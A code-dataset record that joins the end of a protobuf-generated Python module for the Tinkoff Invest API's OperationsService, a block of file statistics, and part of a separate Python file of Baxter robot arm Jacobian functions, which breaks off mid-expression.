# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PortfolioPosition)
})
_sym_db.RegisterMessage(PortfolioPosition)
PositionsSecurities = _reflection.GeneratedProtocolMessageType('PositionsSecurities', (_message.Message,), {
'DESCRIPTOR' : _POSITIONSSECURITIES,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsSecurities)
})
_sym_db.RegisterMessage(PositionsSecurities)
PositionsFutures = _reflection.GeneratedProtocolMessageType('PositionsFutures', (_message.Message,), {
'DESCRIPTOR' : _POSITIONSFUTURES,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsFutures)
})
_sym_db.RegisterMessage(PositionsFutures)
BrokerReportRequest = _reflection.GeneratedProtocolMessageType('BrokerReportRequest', (_message.Message,), {
'DESCRIPTOR' : _BROKERREPORTREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.BrokerReportRequest)
})
_sym_db.RegisterMessage(BrokerReportRequest)
BrokerReportResponse = _reflection.GeneratedProtocolMessageType('BrokerReportResponse', (_message.Message,), {
'DESCRIPTOR' : _BROKERREPORTRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.BrokerReportResponse)
})
_sym_db.RegisterMessage(BrokerReportResponse)
GenerateBrokerReportRequest = _reflection.GeneratedProtocolMessageType('GenerateBrokerReportRequest', (_message.Message,), {
'DESCRIPTOR' : _GENERATEBROKERREPORTREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest)
})
_sym_db.RegisterMessage(GenerateBrokerReportRequest)
GenerateBrokerReportResponse = _reflection.GeneratedProtocolMessageType('GenerateBrokerReportResponse', (_message.Message,), {
'DESCRIPTOR' : _GENERATEBROKERREPORTRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponse)
})
_sym_db.RegisterMessage(GenerateBrokerReportResponse)
GetBrokerReportRequest = _reflection.GeneratedProtocolMessageType('GetBrokerReportRequest', (_message.Message,), {
'DESCRIPTOR' : _GETBROKERREPORTREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest)
})
_sym_db.RegisterMessage(GetBrokerReportRequest)
GetBrokerReportResponse = _reflection.GeneratedProtocolMessageType('GetBrokerReportResponse', (_message.Message,), {
'DESCRIPTOR' : _GETBROKERREPORTRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse)
})
_sym_db.RegisterMessage(GetBrokerReportResponse)
BrokerReport = _reflection.GeneratedProtocolMessageType('BrokerReport', (_message.Message,), {
'DESCRIPTOR' : _BROKERREPORT,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.BrokerReport)
})
_sym_db.RegisterMessage(BrokerReport)
GetDividendsForeignIssuerRequest = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerRequest', (_message.Message,), {
'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest)
})
_sym_db.RegisterMessage(GetDividendsForeignIssuerRequest)
GetDividendsForeignIssuerResponse = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerResponse', (_message.Message,), {
'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse)
})
_sym_db.RegisterMessage(GetDividendsForeignIssuerResponse)
GenerateDividendsForeignIssuerReportRequest = _reflection.GeneratedProtocolMessageType('GenerateDividendsForeignIssuerReportRequest', (_message.Message,), {
'DESCRIPTOR' : _GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest)
})
_sym_db.RegisterMessage(GenerateDividendsForeignIssuerReportRequest)
GetDividendsForeignIssuerReportRequest = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerReportRequest', (_message.Message,), {
'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERREPORTREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest)
})
_sym_db.RegisterMessage(GetDividendsForeignIssuerReportRequest)
GenerateDividendsForeignIssuerReportResponse = _reflection.GeneratedProtocolMessageType('GenerateDividendsForeignIssuerReportResponse', (_message.Message,), {
'DESCRIPTOR' : _GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponse)
})
_sym_db.RegisterMessage(GenerateDividendsForeignIssuerReportResponse)
GetDividendsForeignIssuerReportResponse = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerReportResponse', (_message.Message,), {
'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse)
})
_sym_db.RegisterMessage(GetDividendsForeignIssuerReportResponse)
DividendsForeignIssuerReport = _reflection.GeneratedProtocolMessageType('DividendsForeignIssuerReport', (_message.Message,), {
'DESCRIPTOR' : _DIVIDENDSFOREIGNISSUERREPORT,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport)
})
_sym_db.RegisterMessage(DividendsForeignIssuerReport)
DESCRIPTOR._options = None
_OPERATIONSSERVICE = _descriptor.ServiceDescriptor(
name='OperationsService',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=8643,
serialized_end=9526,
methods=[
_descriptor.MethodDescriptor(
name='GetOperations',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetOperations',
index=0,
containing_service=None,
input_type=_OPERATIONSREQUEST,
output_type=_OPERATIONSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetPortfolio',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetPortfolio',
index=1,
containing_service=None,
input_type=_PORTFOLIOREQUEST,
output_type=_PORTFOLIORESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetPositions',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetPositions',
index=2,
containing_service=None,
input_type=_POSITIONSREQUEST,
output_type=_POSITIONSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetWithdrawLimits',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetWithdrawLimits',
index=3,
containing_service=None,
input_type=_WITHDRAWLIMITSREQUEST,
output_type=_WITHDRAWLIMITSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetBrokerReport',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetBrokerReport',
index=4,
containing_service=None,
input_type=_BROKERREPORTREQUEST,
output_type=_BROKERREPORTRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetDividendsForeignIssuer',
full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetDividendsForeignIssuer',
index=5,
containing_service=None,
input_type=_GETDIVIDENDSFOREIGNISSUERREQUEST,
output_type=_GETDIVIDENDSFOREIGNISSUERRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_OPERATIONSSERVICE)
DESCRIPTOR.services_by_name['OperationsService'] = _OPERATIONSSERVICE
# @@protoc_insertion_point(module_scope)
| 53.90303
| 13,727
| 0.784646
| 15,433
| 124,516
| 5.98892
| 0.039331
| 0.039469
| 0.074621
| 0.061649
| 0.801184
| 0.769407
| 0.761347
| 0.738994
| 0.725751
| 0.665174
| 0
| 0.036028
| 0.102991
| 124,516
| 2,309
| 13,728
| 53.926375
| 0.791489
| 0.023571
| 0
| 0.688073
| 1
| 0.061927
| 0.250222
| 0.220307
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003211
| 0
| 0.003211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2efa57d8190d2ec52b42f4fba02abe7d34eb9492
| 37,555
|
py
|
Python
|
misc/baxter/src_py_no_class/Jos.py
|
YoshimitsuMatsutaIe/rmp_test
|
a7c94ff68b518ef51821484795c308c2c8519c4c
|
[
"MIT"
] | null | null | null |
misc/baxter/src_py_no_class/Jos.py
|
YoshimitsuMatsutaIe/rmp_test
|
a7c94ff68b518ef51821484795c308c2c8519c4c
|
[
"MIT"
] | null | null | null |
misc/baxter/src_py_no_class/Jos.py
|
YoshimitsuMatsutaIe/rmp_test
|
a7c94ff68b518ef51821484795c308c2c8519c4c
|
[
"MIT"
] | null | null | null |
import numpy as np
from math import cos as c
from math import sin as s
from math import tan as ta
from math import sqrt as sq
def jo_W0(q):
return np.array([[0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0]])
def jo_BR(q):
return np.array([[0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0]])
def jo_0(q):
return np.array([[0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0]])
def jo_1(q):
return np.array([[0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), 0, 0, 0, 0, 0, 0], [0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0]])
def jo_2(q):
return np.array([[(0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), -(0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]), 0, 0, 0, 0, 0], [(0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), -(-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]), 0, 0, 0, 0, 0], [0, -0.36435*c(q[1, 0]), 0, 0, 0, 0, 0]])
def jo_3(q):
return np.array([[(-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]), -(-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), 0, 0, 0, 0], [(-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), -(-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]), (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), 0, 0, 0, 0], [0, 0.069*s(q[1, 0])*c(q[2, 0]) - 0.36435*c(q[1, 0]), 0.069*s(q[2, 0])*c(q[1, 0]), 0, 0, 0, 0]])
def jo_4(q):
return np.array([[(0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]), (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), 0, 0, 0], [(0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), -(-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), 0, 0, 0], [0, 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]), 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), 0, 0, 0]])
def jo_5(q):
return np.array([[(0.01*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (-0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) + 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) + 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]), (-0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) - (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]), 0.01*(-(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) - (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]), (-0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [(0.01*((-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + (0.37429*(-0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + (0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]) + (-0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[2, 0]) + (0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*c(q[1, 0]) + (0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]) + 0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]), (-0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[1, 0])*c(q[3, 0]) - (-0.257634355725319*s(q[0, 0]) - 0.257634355725319*c(q[0, 0]))*s(q[1, 0]) + (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*c(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]), (0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - 0.37429*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*s(q[3, 0]) + 0.01*((0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]) - (0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]))*c(q[3, 0])*c(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) - 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[4, 0]) + (0.0487903679018718*s(q[0, 0]) - 0.0487903679018718*c(q[0, 0]))*c(q[2, 0]) - (0.0487903679018718*s(q[0, 0]) + 0.0487903679018718*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]), (-0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) + 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*c(q[4, 0]) + (-0.37429*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + 0.37429*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), -(0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), 0, 0], [0, (0.01*s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.01*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]) + 0.01*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]), (0.01*s(q[1, 0])*c(q[3, 0]) + 